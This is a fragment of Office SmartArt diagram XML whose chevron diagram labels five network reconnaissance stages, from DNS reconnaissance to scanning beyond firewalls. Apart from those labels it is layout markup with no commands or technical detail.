    <dgm:cxn modelId="{6F833015-457A-4A30-B443-1755C662ED11}" srcId="{146B7D42-32C0-4DD8-8CA4-B79211159981}" destId="{10AF3A7E-C0E8-4B5A-BDAB-AC66FDE76920}" srcOrd="1" destOrd="0" parTransId="{B0B4A931-ACFF-4C5C-90ED-2E85218F9197}" sibTransId="{BD40328C-EFB2-4304-89C8-9D2F7780F3F9}"/>
    <dgm:cxn modelId="{C3842218-C332-4C95-8C9C-7E0597030312}" type="presOf" srcId="{FE6AA93D-95BB-48F7-8A99-99B9411E2445}" destId="{0AF4AC1B-E06F-48E1-8BB4-EB0F1CC81997}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{07809122-1665-4876-B700-50EB0F94E148}" type="presOf" srcId="{6CF71AEC-FE93-4463-AE7D-DBEF6196B9EC}" destId="{4A2A1357-4F14-418A-BE0B-CC77B55B5D07}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{9A87462B-B88C-42E1-9A76-BA818B1CC111}" type="presOf" srcId="{5A36C25F-92A2-4E53-8824-0700907674DA}" destId="{4F5C09C4-BEE7-4688-BF30-58E2C7BED38F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{6BCD6832-C15D-43DF-A1F8-D7A807C5C7FD}" srcId="{146B7D42-32C0-4DD8-8CA4-B79211159981}" destId="{4AA4EDB9-469F-493D-9213-10FBACC3EED8}" srcOrd="6" destOrd="0" parTransId="{A933DF63-719B-4E59-A894-3802B885A089}" sibTransId="{D6AA18D3-2622-43DD-BF2B-73DA064A05EF}"/>
    <dgm:cxn modelId="{53AE5336-345A-4E12-BD5C-8996BBFD38F0}" type="presOf" srcId="{A00FB3D3-0A9F-4E2B-A501-2FC92637A08C}" destId="{22F48EE0-C090-408C-942B-72CC47DADE39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{E3D63538-E6DE-4DD0-8EBF-59B55004FAE6}" srcId="{146B7D42-32C0-4DD8-8CA4-B79211159981}" destId="{A00FB3D3-0A9F-4E2B-A501-2FC92637A08C}" srcOrd="5" destOrd="0" parTransId="{978D5447-5D1A-40F6-BB70-67697A329B46}" sibTransId="{6CF71AEC-FE93-4463-AE7D-DBEF6196B9EC}"/>
    <dgm:cxn modelId="{75469B41-96F9-446B-9671-8F9C7BDD0119}" type="presOf" srcId="{146B7D42-32C0-4DD8-8CA4-B79211159981}" destId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{E01C1848-218E-41D9-8634-BF2F45F648D8}" type="presOf" srcId="{E75DCAA4-80C6-4461-9808-81196D93F68B}" destId="{B54C72F4-0D83-4A51-A315-6C856AF8C3CE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{7F64974D-3482-4230-A470-06600349D5D0}" type="presOf" srcId="{DAB46487-768B-477C-AC01-C70F52985905}" destId="{8415F704-377D-45E8-B3A7-3B1128A7B574}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{652A1A7C-EA67-46EB-90B2-F213B6C1382B}" type="presOf" srcId="{FED38A34-03BB-4B82-B567-A41F0B50583F}" destId="{5C442F18-DDC4-4CAA-8FBD-4E2FF28BA77C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{780B7788-A24F-4E2D-AB57-ABC1A7022CF9}" type="presOf" srcId="{BD40328C-EFB2-4304-89C8-9D2F7780F3F9}" destId="{8C856DE0-6582-488A-B9D6-7866B9135E34}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{95D12C8A-15D0-4C65-BBD7-E947C5C0E261}" type="presOf" srcId="{4AA4EDB9-469F-493D-9213-10FBACC3EED8}" destId="{0DD1A97F-4D88-4428-97AE-D0DC2CF76558}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{0E099BA8-2381-4F61-AD22-A2D6F61D3AA3}" srcId="{146B7D42-32C0-4DD8-8CA4-B79211159981}" destId="{C1AA5765-4E48-4F0D-9B62-520575F66BDA}" srcOrd="2" destOrd="0" parTransId="{BC1ED148-964D-4263-A2D5-98BE9538937A}" sibTransId="{DAB46487-768B-477C-AC01-C70F52985905}"/>
    <dgm:cxn modelId="{C78AA9AE-4AE5-4719-B5D0-2DC7CDC98259}" type="presOf" srcId="{C1AA5765-4E48-4F0D-9B62-520575F66BDA}" destId="{B3FE02C3-8765-4560-9AD3-F118D2CBEA96}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{6900ABB5-CF73-4CE5-8DE8-833096D4EB80}" type="presOf" srcId="{10AF3A7E-C0E8-4B5A-BDAB-AC66FDE76920}" destId="{BBDC83BC-83AE-47CB-A96E-1F7247EB63F6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{ABE720BA-7706-4D02-A776-A0015EF5DD02}" srcId="{146B7D42-32C0-4DD8-8CA4-B79211159981}" destId="{C7687006-8EC6-419D-91A4-5A53710E0290}" srcOrd="4" destOrd="0" parTransId="{8DED5232-8DF2-484F-B7F2-5D58D18E4A1E}" sibTransId="{FE6AA93D-95BB-48F7-8A99-99B9411E2445}"/>
    <dgm:cxn modelId="{E71D34BE-6F11-416A-AD12-3CD8DC9D0A84}" srcId="{146B7D42-32C0-4DD8-8CA4-B79211159981}" destId="{5A36C25F-92A2-4E53-8824-0700907674DA}" srcOrd="0" destOrd="0" parTransId="{00A4F2EC-34B2-4D9F-AA1C-3F984FC5B196}" sibTransId="{E75DCAA4-80C6-4461-9808-81196D93F68B}"/>
    <dgm:cxn modelId="{439D4BCB-7A80-4F80-A6A7-2BE3EC892765}" type="presOf" srcId="{509332C4-472B-4F69-89D6-EB035E21147D}" destId="{857943C1-02D9-4588-B200-8F69BA265515}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{81ED9FCE-619B-4EE9-8E50-1734E63D2A9F}" srcId="{146B7D42-32C0-4DD8-8CA4-B79211159981}" destId="{509332C4-472B-4F69-89D6-EB035E21147D}" srcOrd="3" destOrd="0" parTransId="{ECEF362E-5C12-4ABA-AE7F-0CFF364F3A40}" sibTransId="{FED38A34-03BB-4B82-B567-A41F0B50583F}"/>
    <dgm:cxn modelId="{8195D2E3-0C51-42F2-BC20-8922A749E7D6}" type="presOf" srcId="{C7687006-8EC6-419D-91A4-5A53710E0290}" destId="{39B18046-95A2-426D-B929-94F60BF39549}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{495C93F9-C917-49BA-91CF-4ADB3B2469F5}" type="presOf" srcId="{D6AA18D3-2622-43DD-BF2B-73DA064A05EF}" destId="{149312C0-C957-49F9-BC52-7532C4D4544F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{C87D993E-5A6C-47DF-987C-DCEF3A6E31C1}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{D1C93BBA-FD51-4CEC-A16E-2191B990EE7B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{73DFBD87-FC2A-4567-8CAB-BF155716CDE5}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{4F5C09C4-BEE7-4688-BF30-58E2C7BED38F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{29DE009F-58F0-4D75-BE46-D368EF78559C}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{B54C72F4-0D83-4A51-A315-6C856AF8C3CE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{4ABBE881-AB29-4AB0-883D-0D1B7AFE6042}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{1C64654E-6F5C-4A97-9A79-A09980D8D77F}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{267515A9-1A81-4560-8529-2637FF6A840F}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{BBDC83BC-83AE-47CB-A96E-1F7247EB63F6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{D75AE9C5-3563-4FF2-B173-3F2E0D6EEF78}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{8C856DE0-6582-488A-B9D6-7866B9135E34}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{4C16B61C-DD02-47BB-86B3-500778F71407}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{3587C51B-1C0D-493D-8EEA-043C8E253F76}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{F712C47F-8F80-439F-B49B-E6634F6E9FC8}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{B3FE02C3-8765-4560-9AD3-F118D2CBEA96}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{1E2ECEDF-41FB-4DE7-B9DD-DBA6F8831624}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{8415F704-377D-45E8-B3A7-3B1128A7B574}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{CF0641E4-0E95-42AF-B30E-FCFED601B248}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{02802196-9015-4BCD-BD9B-51E79264DB44}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{E83AD043-BE42-42C5-A638-4B67F6365500}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{857943C1-02D9-4588-B200-8F69BA265515}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{9958CBB2-5742-475A-976F-4F54BBA15500}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{5C442F18-DDC4-4CAA-8FBD-4E2FF28BA77C}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{B77896A8-BB02-4F17-8E71-C9DBE11E7BEF}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{0EB5DE32-2675-4B51-9D23-ADB4F4DD9AC4}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{2252CBD9-5E13-4966-82B0-FF624CBF9AE9}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{39B18046-95A2-426D-B929-94F60BF39549}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{D95829AD-736E-4268-A4F4-4D98B6FADC2C}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{0AF4AC1B-E06F-48E1-8BB4-EB0F1CC81997}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{515BF5E8-66F3-43C2-B182-4962DB3F1A67}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{7731624E-7D3B-4609-ADC3-5A505BC772F5}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{97EA2C2C-7CC4-4AD5-91AB-28D2E84F6A52}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{22F48EE0-C090-408C-942B-72CC47DADE39}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{D75658FB-1A7A-4BCA-8BA6-717723408D9D}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{4A2A1357-4F14-418A-BE0B-CC77B55B5D07}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{DF3A393B-58FD-4C03-8E76-CEA74C8367DC}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{973104DE-32F5-4CA6-8035-3A26783D528C}" srcOrd="18" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{E2FC7815-67C0-43FB-952C-6A23E500DB89}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{0DD1A97F-4D88-4428-97AE-D0DC2CF76558}" srcOrd="19" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{624950EA-1D41-499C-A866-7965E866229F}" type="presParOf" srcId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" destId="{149312C0-C957-49F9-BC52-7532C4D4544F}" srcOrd="2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CDBF1C-C896-43B9-9F4B-D4194B0DF97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A3A2260-AEA4-46C9-B3B1-9D6EA3DFE417}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>DNS Reconnaissance</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4282614A-D752-40BE-A9A8-8941DFB50E65}" type="parTrans" cxnId="{341AC68D-D165-451E-A512-50EED722D320}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE3F4520-0BA9-486D-AEA1-F428AE722BB4}" type="sibTrans" cxnId="{341AC68D-D165-451E-A512-50EED722D320}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20A11816-3F90-4230-96C6-8BD476DB4FF4}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Trace / Route Mapping</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3A9347E7-B45D-4CBD-88BD-B08BD67DABEE}" type="parTrans" cxnId="{26510831-3781-4C46-84BC-F50F8137197D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{51E83ADB-1319-4230-8073-B9428F8D7678}" type="sibTrans" cxnId="{26510831-3781-4C46-84BC-F50F8137197D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5785BF67-2556-4C80-92D7-E05167E61D41}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Life Host Discovery and Port Scanning</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABBC3CE7-9E4F-47B8-AA51-3CC1F5A0572C}" type="parTrans" cxnId="{6ABC9BA4-4DEE-48FE-964C-D286B83F2E9A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB82EC88-1928-417A-BC1E-C474FE141227}" type="sibTrans" cxnId="{6ABC9BA4-4DEE-48FE-964C-D286B83F2E9A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8B372A1B-900A-4897-A750-8CCAD1C9BB89}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Enumerating the Edge</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E48BAD62-EE04-43EB-B8F9-9A8D29E92052}" type="parTrans" cxnId="{6D257478-A589-4775-A946-1169C42E8130}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DEBEF8B6-AAB1-4350-99ED-5B607F194304}" type="sibTrans" cxnId="{6D257478-A589-4775-A946-1169C42E8130}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2292B62E-F793-4197-A758-6FDF7BCEFDA5}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Scanning beyond Firewalls</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4550531B-AD8A-4C22-A74B-EF7D64CE1A3A}" type="parTrans" cxnId="{23734EF7-71B9-44C2-B997-250CBEEED1EF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E778899-634A-488E-944A-0A606D429649}" type="sibTrans" cxnId="{23734EF7-71B9-44C2-B997-250CBEEED1EF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00823BCA-70BA-4518-8D52-4E3C9CC2CA90}" type="pres">
      <dgm:prSet presAssocID="{CBCDBF1C-C896-43B9-9F4B-D4194B0DF97D}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{58319A38-AA77-4023-8E9D-00979E8A5AF7}" type="pres">
      <dgm:prSet presAssocID="{7A3A2260-AEA4-46C9-B3B1-9D6EA3DFE417}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2F4F07AE-4B7A-4CD5-8889-8F781A6CF553}" type="pres">
      <dgm:prSet presAssocID="{FE3F4520-0BA9-486D-AEA1-F428AE722BB4}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{520E3167-7DCA-45F4-8E3D-35C2F4E96D15}" type="pres">
      <dgm:prSet presAssocID="{20A11816-3F90-4230-96C6-8BD476DB4FF4}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5A21FC5C-B6E2-40F8-B305-29FAA15DCA40}" type="pres">
      <dgm:prSet presAssocID="{51E83ADB-1319-4230-8073-B9428F8D7678}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{045FC462-FF4C-458A-812D-BB2FBA45C88C}" type="pres">
      <dgm:prSet presAssocID="{8B372A1B-900A-4897-A750-8CCAD1C9BB89}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CFD9158F-5D1D-444A-92E2-8D65A0E866E0}" type="pres">
      <dgm:prSet presAssocID="{DEBEF8B6-AAB1-4350-99ED-5B607F194304}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6F0FAC18-9360-49B4-83C9-3EE79CABF66A}" type="pres">
      <dgm:prSet presAssocID="{2292B62E-F793-4197-A758-6FDF7BCEFDA5}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{92B44415-74D6-41D1-B18B-60338B584AB0}" type="pres">
      <dgm:prSet presAssocID="{7E778899-634A-488E-944A-0A606D429649}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D1A1A15E-12EF-441A-BDA0-6BEB9C219300}" type="pres">
      <dgm:prSet presAssocID="{5785BF67-2556-4C80-92D7-E05167E61D4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FDCBF23-8F00-4FC6-A06D-4F25E1274B2E}" type="presOf" srcId="{CBCDBF1C-C896-43B9-9F4B-D4194B0DF97D}" destId="{00823BCA-70BA-4518-8D52-4E3C9CC2CA90}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{C1714A25-E861-4398-8D89-0193597BFEC0}" type="presOf" srcId="{8B372A1B-900A-4897-A750-8CCAD1C9BB89}" destId="{045FC462-FF4C-458A-812D-BB2FBA45C88C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{0BB55C30-9E96-4C84-AE44-726AFA5CD90C}" type="presOf" srcId="{5785BF67-2556-4C80-92D7-E05167E61D41}" destId="{D1A1A15E-12EF-441A-BDA0-6BEB9C219300}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{26510831-3781-4C46-84BC-F50F8137197D}" srcId="{CBCDBF1C-C896-43B9-9F4B-D4194B0DF97D}" destId="{20A11816-3F90-4230-96C6-8BD476DB4FF4}" srcOrd="1" destOrd="0" parTransId="{3A9347E7-B45D-4CBD-88BD-B08BD67DABEE}" sibTransId="{51E83ADB-1319-4230-8073-B9428F8D7678}"/>
    <dgm:cxn modelId="{65544566-87B4-4B04-9976-426F5B53DE7E}" type="presOf" srcId="{7A3A2260-AEA4-46C9-B3B1-9D6EA3DFE417}" destId="{58319A38-AA77-4023-8E9D-00979E8A5AF7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{6D257478-A589-4775-A946-1169C42E8130}" srcId="{CBCDBF1C-C896-43B9-9F4B-D4194B0DF97D}" destId="{8B372A1B-900A-4897-A750-8CCAD1C9BB89}" srcOrd="2" destOrd="0" parTransId="{E48BAD62-EE04-43EB-B8F9-9A8D29E92052}" sibTransId="{DEBEF8B6-AAB1-4350-99ED-5B607F194304}"/>
    <dgm:cxn modelId="{341AC68D-D165-451E-A512-50EED722D320}" srcId="{CBCDBF1C-C896-43B9-9F4B-D4194B0DF97D}" destId="{7A3A2260-AEA4-46C9-B3B1-9D6EA3DFE417}" srcOrd="0" destOrd="0" parTransId="{4282614A-D752-40BE-A9A8-8941DFB50E65}" sibTransId="{FE3F4520-0BA9-486D-AEA1-F428AE722BB4}"/>
    <dgm:cxn modelId="{6ABC9BA4-4DEE-48FE-964C-D286B83F2E9A}" srcId="{CBCDBF1C-C896-43B9-9F4B-D4194B0DF97D}" destId="{5785BF67-2556-4C80-92D7-E05167E61D41}" srcOrd="4" destOrd="0" parTransId="{ABBC3CE7-9E4F-47B8-AA51-3CC1F5A0572C}" sibTransId="{EB82EC88-1928-417A-BC1E-C474FE141227}"/>
    <dgm:cxn modelId="{466D21C2-BC76-4CFE-A986-578AAB631BEA}" type="presOf" srcId="{2292B62E-F793-4197-A758-6FDF7BCEFDA5}" destId="{6F0FAC18-9360-49B4-83C9-3EE79CABF66A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{58A576EC-AACF-46F6-BF9F-7FFF72778614}" type="presOf" srcId="{20A11816-3F90-4230-96C6-8BD476DB4FF4}" destId="{520E3167-7DCA-45F4-8E3D-35C2F4E96D15}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{23734EF7-71B9-44C2-B997-250CBEEED1EF}" srcId="{CBCDBF1C-C896-43B9-9F4B-D4194B0DF97D}" destId="{2292B62E-F793-4197-A758-6FDF7BCEFDA5}" srcOrd="3" destOrd="0" parTransId="{4550531B-AD8A-4C22-A74B-EF7D64CE1A3A}" sibTransId="{7E778899-634A-488E-944A-0A606D429649}"/>
    <dgm:cxn modelId="{CA8F9AEE-160A-40C6-B0E6-211096320ADE}" type="presParOf" srcId="{00823BCA-70BA-4518-8D52-4E3C9CC2CA90}" destId="{58319A38-AA77-4023-8E9D-00979E8A5AF7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{1084AC7E-3B2F-4DA4-865B-D516D35F4774}" type="presParOf" srcId="{00823BCA-70BA-4518-8D52-4E3C9CC2CA90}" destId="{2F4F07AE-4B7A-4CD5-8889-8F781A6CF553}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{F4E3CD50-68CA-4120-90AB-A982E11D49B4}" type="presParOf" srcId="{00823BCA-70BA-4518-8D52-4E3C9CC2CA90}" destId="{520E3167-7DCA-45F4-8E3D-35C2F4E96D15}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{F77AF7B7-C27C-4ADD-9B4D-6D80257D4A5A}" type="presParOf" srcId="{00823BCA-70BA-4518-8D52-4E3C9CC2CA90}" destId="{5A21FC5C-B6E2-40F8-B305-29FAA15DCA40}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{883B61E8-62F8-44C0-B6A3-333EEC4DFDA5}" type="presParOf" srcId="{00823BCA-70BA-4518-8D52-4E3C9CC2CA90}" destId="{045FC462-FF4C-458A-812D-BB2FBA45C88C}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{FE129F40-5F71-4041-94CE-F089B165C3A4}" type="presParOf" srcId="{00823BCA-70BA-4518-8D52-4E3C9CC2CA90}" destId="{CFD9158F-5D1D-444A-92E2-8D65A0E866E0}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
